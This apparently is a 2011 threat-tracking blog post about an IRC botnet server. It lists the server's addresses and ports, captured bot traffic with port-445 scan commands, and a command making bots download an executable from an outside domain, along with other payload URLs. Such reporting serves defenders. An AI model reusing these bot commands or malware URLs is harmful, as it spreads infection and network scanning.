92.241.169.165(irc botnet hosted in Russian Federation Moscow Oao Webalta)

By Pig, October 2, 2011

Remote Host Port Number
83.125.22.163 80
92.241.169.165 47221

NICK [N00_USA_XP_4629026]
PRIVMSG [N00_USA_XP_4629P
@ :scan; Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
MODE #ms2 -ix
USER SP2-510 * 0 :COMPUTERNAME
MODE [N00_USA_XP_4629026]
A -ix
JOIN #ms2
PRIVMSG #xxs :HTTP SET http://allic.co.kr/lo.exe

other links:
# http://allic.co.kr/ms.exe
# http://allic.co.kr/set.exe

UPDATE:
Remote Host Port Number
173.255.217.235 47221

hosting infos:
http://whois.domaintools.com/92.241.169.165

Categories: Uncategorized

Previous post96.127.179.26(ngrBot hosted in United States Chicago Singlehop Inc)

Next postx.update1001.biz(ngrBot hosted in France Paris Gandi)